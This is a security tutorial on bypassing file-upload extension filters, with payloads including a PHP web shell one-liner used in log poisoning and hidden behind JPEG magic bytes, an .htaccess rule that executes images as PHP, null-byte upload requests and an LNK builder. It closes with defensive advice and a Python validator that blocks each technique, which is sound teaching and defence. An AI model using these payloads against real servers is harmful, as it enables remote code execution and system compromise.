Many web applications restrict file uploads by allowing only certain extensions (e.g., .jpg, .png). However, attackers can bypass these restrictions using various techniques, leading to severe security risks like Remote Code Execution (RCE) or webshell deployment.
### **Common Techniques to Bypass Extension Filters:**
✅ Double Extensions (`shell.php.png`)
✅ Case Variation (`shell.Php`, `shell.pHp`)
✅ Special Character Injection (`shell.php%00.png`, `shell.php?.png`)
✅ Path Tricks (`shell.php.\png`, `shell.php./png`)
✅ No Extension Upload (`shell`)
### **Why Does This Matter?**
If a server misinterprets the file extension, an attacker can execute arbitrary code, compromising the entire system.
## **You Should Know:**
### **1. Testing File Upload Vulnerabilities**
Use Burp Suite or OWASP ZAP to intercept and modify upload requests:
```http
POST /upload.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=WebKitFormBoundary

--WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="shell.php%00.jpg"
Content-Type: application/x-php
```
### **2. Bypassing MIME-Type Checks**
Modify the `Content-Type` header to fake an image:
```http
Content-Type: image/jpeg
```
### **3. Using Null Byte Injection**
Exploit improper filename parsing:
```bash
curl -F "file=@shell.php%00.jpg" http://example.com/upload
```
### **4. Case Evasion (Linux/Windows)**
Linux is case-sensitive, while Windows is not:
- `shell.PHP` (may bypass case-sensitive filters)
- `shell.php5` (if `.php5` is allowed)
### **5. Alternative Extensions for Execution**
Some servers execute uncommon extensions:
`.phtml`, `.phar`, `.php7`, `.php3`
### **6. Zip File Upload & Extraction Bypass**
Upload a ZIP containing a malicious `.php` file:
```bash
zip shell.zip shell.php
```
If the server extracts files without validation, the PHP file may execute.
### **7. .htaccess Override (Apache)**
Upload a malicious `.htaccess` to execute scripts as PHP:
```apache
AddType application/x-httpd-php .jpg
```
### **8. Log Poisoning via File Upload**
If logs are stored in a web-accessible directory, inject PHP into logs:
```bash
curl -H "User-Agent: <?php system($_GET['cmd']); ?>" http://example.com
```
### **9. Windows Shortcut Exploit (LNK Files)**
Upload a malicious `.lnk` file to execute commands:
```powershell
$shell = New-Object -ComObject WScript.Shell
$shortcut = $shell.CreateShortcut("evil.lnk")
$shortcut.TargetPath = "cmd.exe"
$shortcut.Arguments = "/c calc.exe"
$shortcut.Save()
```
### **10. Defense Bypass with Magic Bytes**
Add image magic bytes to a PHP file:
```bash
echo -e "\xFF\xD8\xFF\xE0<?php system($_GET['cmd']); ?>" > shell.php.jpg
```
## **What Undercode Say:**
File upload vulnerabilities remain a critical attack vector due to improper validation. Developers must:
- Validate both extension and MIME type
- Use allowlists instead of denylists
- Store uploads outside the web root
- Scan files for malicious content
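The four rules above turned into a validator, as an added example that is not part of the original post: it rejects every bypass listed earlier (double and missing extensions, case variation, `%00` and path characters, a spoofed `Content-Type`, script text behind image magic bytes, `.htaccess`) and never stores a file under the client-supplied name. The allowlist, size limit and upload root are assumptions.

```python
import os
import re
import uuid

# Allowlist: permitted extension -> (canonical MIME type, magic bytes a genuine
# file of that type starts with). Constructed for this example.
ALLOWED = {
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
}
MAX_BYTES = 5 * 1024 * 1024                # assumed size limit
ILLEGAL = re.compile(r"[\\/\x00-\x1f]")    # path separators, raw null, control chars

def validate_upload(filename, content_type, data):
    """Return (True, ext) for an acceptable upload, else (False, reason)."""
    # 1. Null-byte and path tricks: shell.php%00.jpg, shell.php.\png, shell.php./png
    if "%00" in filename or ILLEGAL.search(filename):
        return False, "illegal characters in filename"
    # 2. Exactly one non-empty extension: blocks shell.php.png, "shell" and ".htaccess"
    base, *exts = filename.split(".")
    if not base or len(exts) != 1 or not exts[0]:
        return False, "filename must be name.ext"
    ext = exts[0].lower()                  # case-insensitive: shell.pHp -> php
    if ext not in ALLOWED:
        return False, f".{ext} not in allowlist"
    mime, signatures = ALLOWED[ext]
    # 3. Declared Content-Type must agree with the extension (consistency only, never trusted)
    if content_type.lower() != mime:
        return False, "content-type does not match extension"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    # 4. Actual bytes must carry the signature the extension promises
    if not data.startswith(signatures):    # startswith accepts a tuple of prefixes
        return False, "file signature does not match extension"
    # 5. Heuristic content scan for script tags stuffed after valid magic bytes (technique 10)
    lowered = data.lower()
    if b"<?php" in lowered or b"<?=" in lowered or b"<script" in lowered:
        return False, "script content embedded in image"
    return True, ext

def storage_path(ext, upload_root):
    """Server-generated name under a directory outside the web root; the client name is never used."""
    return os.path.join(upload_root, f"{uuid.uuid4().hex}.{ext}")
```

Serve stored files back through a handler that sets a fixed `Content-Type` from the validated extension, never directly from a directory the web server is configured to execute.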
### **Expected Output:**
A secure file upload system that prevents unauthorized script execution while allowing legitimate file storage.
Reported By: Amitkumar711 Bugbounty – Hackers Feeds